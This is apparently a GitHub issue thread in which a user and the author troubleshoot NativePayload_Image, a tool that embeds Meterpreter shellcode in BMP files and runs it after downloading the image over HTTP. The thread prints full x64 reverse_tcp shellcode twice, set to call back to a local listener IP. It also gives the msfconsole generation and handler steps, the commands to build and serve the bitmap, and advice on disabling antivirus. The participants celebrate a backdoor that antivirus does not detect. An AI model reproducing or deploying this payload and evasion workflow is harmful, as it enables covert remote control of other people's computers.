Closed Ciangi closed 7 years ago
now you need to use Backdoor again by this syntax to downloading BMP file from apache in this case your syntax is 👍
c:> NativePayload_Image.exe url "http://target_webserver_ip/test3.bmp" 449 54
note: 449 is your payload length and 54 is your header length
but your payload should be 510 i think 449 is wrong maybe .... ;)
msf > use payload/windows/x64/meterpreter/reverse_tcp msf payload(reverse_tcp) > set LHOST 192.168.1.104 LHOST => 192.168.1.104 msf payload(reverse_tcp) > generate windows/x64/meterpreter/reverse_tcp - 449 bytes (stage 1) http://www.metasploit.com VERBOSE=false, LHOST=192.168.1.104, LPORT=4444, ReverseAllowProxy=false, ReverseConnectRetries=5, ReverseListenerThreaded=false, PayloadUUIDTracking=false, EnableStageEncoding=false, StageEncoderSaveRegisters=, StageEncodingFallback=true, PrependMigrate=false, EXITFUNC=process, AutoLoadStdapi=true, AutoVerifySession=true, AutoVerifySessionTimeout=30, InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true, EnableUnicodeEncoding=false, SessionRetryTotal=3600, SessionRetryWait=10, SessionExpirationTimeout=604800, SessionCommunicationTimeout=300 buf = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50" + "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" + "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" + "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" + "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" + "\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f" + "\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0" + "\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49" + "\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6" + "\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" + "\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8" + "\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" + "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41" + "\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83" + "\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9" + "\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00" + "\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49" + "\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x01\x68\x41\x54" + "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5" + "\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b" + "\x00\xff\xd5\x6a\x05\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31" + "\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41" + "\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58" + "\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5" + "\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56" + "\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04" + "\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48" + "\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00" + "\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53" + "\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89" + "\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff" + "\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff" + "\xe7"
./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 449 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0 [ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0
I'm running on kali linux and i your .cs code compiled with mono. Is it ok? I typed: mcs -out:NativePayload_Image.exe NativePayload_Image.cs
# mono --version Mono JIT compiler version 4.6.2 (Debian 4.6.2.7+dfsg-1) Copyright (C) 2002-2014 Novell, Inc, Xamarin Inc and Contributors. www.mono-project.com TLS: __thread SIGSEGV: altstack Notifications: epoll Architecture: amd64 Disabled: none Misc: softdebug LLVM: supported, not enabled. GC: sgen
Oh okay .... my Mono is for .net 4.6 ...and it's not supported in your project ;D
ok now tell me are you have Anti-virus ? if yes please check this without AV so disable all av features or exit that tool ;D and tell me your result now
damn man yea make this project by .NET 4.0 or 3.5 hahahaahahaha
yep i have Avast, disabled it, opened image and nothing ... :<
Do you know how to downgrade Mono ?:( or do you know another tool to compile .cs with .net 4.0 ??
just change your project properties to .NET 4.0 then it should work ;D
mono , when you want make new project i think you can select .NET Framework version then you can change it to 4.0 or 3.5
AND 449 in this case is correct your payload length is 449
unfortunately in MonoDevelop can't do this XD
what a ....
oh sorry ! i can change ! but for 4.5 , 4.5.1 , 4.5.2, 4.6 and 4.6.1 !! ;(
in "monodevelop" tool you can change it 👍 Project options => build > general > Target framework : select mono/.NET 4.0 or gamelogic.co.za/grids/documentation-contents/how-to-set-your-target-framework-to-mono-net4-in-monodevelop/ or https://stackoverflow.com/questions/6378137/mono-how-to-change-target-framework
in this link maybe you can compile your code ;) https://www.tutorialspoint.com/compile_csharp_online.php
not working :( but have great idea ! I run visual studio 2015 enterprise on my windows and try to compile it in .net 4 ;D
Okay so i tried to compile it with .net 4 or .net 4 client profile and the same .... can't establish connection :(
still got:
./test.exe url "http://192.168.1.104:81/test3.bmp" 449 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files
[+] File Scanning .. . .
[+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 449 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception:
System.DllNotFoundException: kernel32
at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint)
at NativePayload_Image.Program.Main (System.String[] args) [0x0049f] in
Okay i know where is a problem. reference to that page: https://www.essentialobjects.com/forum/postsm17563_Syntax-Editor-throwing-exception-on-Linux--VirtualAlloc-not-found.aspx
System.EntryPointNotFoundException: VirtualAlloc
answer: The controls are for Windows only and it uses Windows API extensively. It's not just one or two functions calls. It's everywhere. Thus it's not possible to run on Linux.
i executed the exe file on windows and works like a charm! thanks for help!
to be honest with you, i got first backdoor which is not detectable by my AVs :O Good job!
your welcome
" step1 : msfconsole step2 : msf > use payload/windows/x64/meterpreter/reverse_tcp step3 : set lhost 192.168.1.104 step4 : generate finally you can use stage1 "
then
NativePayload_Image.exe create “test3.bmp” fc,48,83,e4,f0,e8,cc,00,00,00,41,51,41,50,52,51,56,48,31,d2,65,48,8b,52,60,48,8b,52,18,48,8b,52,20,48,8b,72,50,48,0f,b7,4a,4a,4d,31,c9,48,31,c0,ac,3c,61,7c,02,2c,20,41,c1,c9,0d,41,01,c1,e2,ed,52,41,51,48,8b,52,20,8b,42,3c,48,01,d0,66,81,78,18,0b,02,0f,85,72,00,00,00,8b,80,88,00,00,00,48,85,c0,74,67,48,01,d0,50,8b,48,18,44,8b,40,20,49,01,d0,e3,56,48,ff,c9,41,8b,34,88,48,01,d6,4d,31,c9,48,31,c0,ac,41,c1,c9,0d,41,01,c1,38,e0,75,f1,4c,03,4c,24,08,45,39,d1,75,d8,58,44,8b,40,24,49,01,d0,66,41,8b,0c,48,44,8b,40,1c,49,01,d0,41,8b,04,88,48,01,d0,41,58,41,58,5e,59,5a,41,58,41,59,41,5a,48,83,ec,20,41,52,ff,e0,58,41,59,5a,48,8b,12,e9,4b,ff,ff,ff,5d,49,be,77,73,32,5f,33,32,00,00,41,56,49,89,e6,48,81,ec,a0,01,00,00,49,89,e5,49,bc,02,00,11,5c,c0,a8,01,68,41,54,49,89,e4,4c,89,f1,41,ba,4c,77,26,07,ff,d5,4c,89,ea,68,01,01,00,00,59,41,ba,29,80,6b,00,ff,d5,6a,05,41,5e,50,50,4d,31,c9,4d,31,c0,48,ff,c0,48,89,c2,48,ff,c0,48,89,c1,41,ba,ea,0f,df,e0,ff,d5,48,89,c7,6a,10,41,58,4c,89,e2,48,89,f9,41,ba,99,a5,74,61,ff,d5,85,c0,74,0c,49,ff,ce,75,e5,68,f0,b5,a2,56,ff,d5,48,83,ec,10,48,89,e2,4d,31,c9,6a,04,41,58,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,83,c4,20,5e,89,f6,6a,40,41,59,68,00,10,00,00,41,58,48,89,f2,48,31,c9,41,ba,58,a4,53,e5,ff,d5,48,89,c3,49,89,c7,4d,31,c9,49,89,f0,48,89,da,48,89,f9,41,ba,02,d9,c8,5f,ff,d5,48,01,c3,48,29,c6,48,85,f6,75,e1,41,ff,e7
[!] Making New Bitmap File ... [!] Bitmap File Name : test3.bmp [+] Creating Header for Bitmap File ... [>] Header adding (length 54) : 424d5e0e00000000000036000000280000........ [+] Injecting Meterpreter Payload to Bitmap File ... [>] Injecting Payload (length 449) : fc4883e4f0e8cc00000041514150525156........ [+] Adding Ex-Payload for Bitmap File ... [>] Ex-Payload adding (length FF * 3114). [!] File test3.bmp with length 4621 bytes Created.
then
msfconsole use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set lhost 192.168.1.104 exploit
then
cp test3.bmp /var/www/html/
then download and open file from another computer (windows x64 architecture) in local network and no one session appear...
or...
when i want to publish as url:
**./NativePayload_Image.exe url "http://192.168.1.104:81/test3.bmp" 510 54
NativePayload_Image Tool , Published by Damon Mohammadbagher , April 2017 Detecting/Injecting Meterpreter Payload bytes from BMP Image Files
[+] Detecting Meterpreter Payload bytes by Image Files [+] File Scanning .. . . [+] Reading Payloads from URL "http://192.168.1.104:81/test3.bmp"
[+] Scanning Payload with length 510 from byte 54
Bingo Meterpreter session by BMP images ;)
Unhandled Exception: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0 [ERROR] FATAL UNHANDLED EXCEPTION: System.DllNotFoundException: kernel32 at (wrapper managed-to-native) NativePayload_Image.Program:VirtualAlloc (uint,uint,uint,uint) at NativePayload_Image.Program.Main (System.String[] args) [0x004db] in <48012d87c7454d0b8ed5325d571ec9b6>:0**
could You help me please?